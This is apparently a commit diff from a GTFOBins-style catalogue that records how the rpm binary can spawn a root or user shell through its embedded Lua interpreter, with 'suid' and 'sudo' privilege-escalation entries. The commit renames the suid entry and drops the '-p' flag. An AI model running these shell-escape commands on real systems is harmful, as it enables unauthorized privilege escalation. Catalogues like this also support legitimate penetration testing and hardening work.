fix rpm suid command

master
Mr. Robot 3 years ago committed by GitHub
parent 0f48c1b057
commit 7d5d8d6b7a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -5,9 +5,9 @@
"code": "rpm --eval '%{lua:os.execute(\"/bin/sh\")}'"
}
],
"suid": [
"limited-suid": [
{
"code": "./rpm --eval '%{lua:os.execute(\"/bin/sh\", \"-p\")}'"
"code": "./rpm --eval '%{lua:os.execute(\"/bin/sh\")}'"
}
],
"sudo": [
@ -20,4 +20,4 @@
}
]
}
}
}

Loading…
Cancel
Save